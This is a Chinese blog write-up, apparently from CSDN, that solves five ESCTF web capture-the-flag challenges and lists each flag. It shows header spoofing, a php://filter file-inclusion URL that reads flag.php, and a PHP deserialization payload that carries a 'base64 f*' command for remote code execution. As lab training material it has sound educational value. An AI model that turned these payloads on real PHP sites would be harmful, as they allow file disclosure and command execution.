ESCTF-Web赛题WP

本文讲述了在一系列ESCTF挑战中,参与者通过PHP编程技巧解决加密、URL参数处理、RCE漏洞利用等问题,寻找隐藏的flag。涉及关键词有安全的POST参数传递、文件读取、序列化与URL编码等。
摘要由CSDN通过智能技术生成

0x01-初次见面-怦然心动:your name?

随便输入一个字

根据提示可以看到 我们需要看源代码 直接 搜索 secret 关键字或者 ESCTF


flag

ESCTF{K1t0@@_iS_S0_HAPPy}


0x02-小k的请求

更安全的传参 post 参数为ESCTF 值为 love

自己的ip 同时还有个要求 是需要从度娘转过来 https://www.baidu.com/ 此时需要两个请求标头 一是X-Forwarded-For 和 Referer

flag

ESCTF{Have_@_Good_DAY_t0dAy}


0x03-传奇故事-多多包涵

发现url 中包含了k1t0.php 根据提示 flag.php 我们直接可以伪协议读取 文件

index.php?k1=php://filter/read/convert.base64-encode/resource=flag.php

base64 解码

PD9waHAKIkVTQ1RGe0sxdDBfSTJfYmlHX2hlck99IgogICAgPz4K

flag

ESCTF{K1t0_I2_biG_herO}

0x04-1+1真的好难

可以看到 传递了1+1的答案并且是用post传递的参数

根据页面提示:question1

我只是限制了不能从前端按钮传参 可以直接用hackbar

post参数:

question1=2&question2=3

flag

ESCTF{EXPLO_Re@Sec_RISK!!!}

0x05-喂,我不叫喂我叫k1t0

解答


<?php
class K1t0
{
    protected $k1="base64 f*";


}
class Breeze
{
    public $rce;
    public $str;

}
class QWQ
{
    public $p;


}
$a=new Breeze();
$a->str=new QWQ();
$a->str->p=new K1t0();

echo urlencode(serialize($a));

?>

在url中10000/?k1t0=O%3A6%3A%22Breeze%22%3A2%3A%7Bs%3A3%3A%22rce%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A3%3A%22QWQ%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A4%3A%22K1t0%22%3A1%3A%7Bs%3A5%3A%22%00%2A%00k1%22%3Bs%3A9%3A%22base64+f%2A%22%3B%7D%7D%7D

得到RVNDVEZ7S0AhdDBfRVhQTE9yXzJSX1RlUU19Cg==

base64解码

flag

ESCTF{K@!t0_EXPLOr_2R_TeQM}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值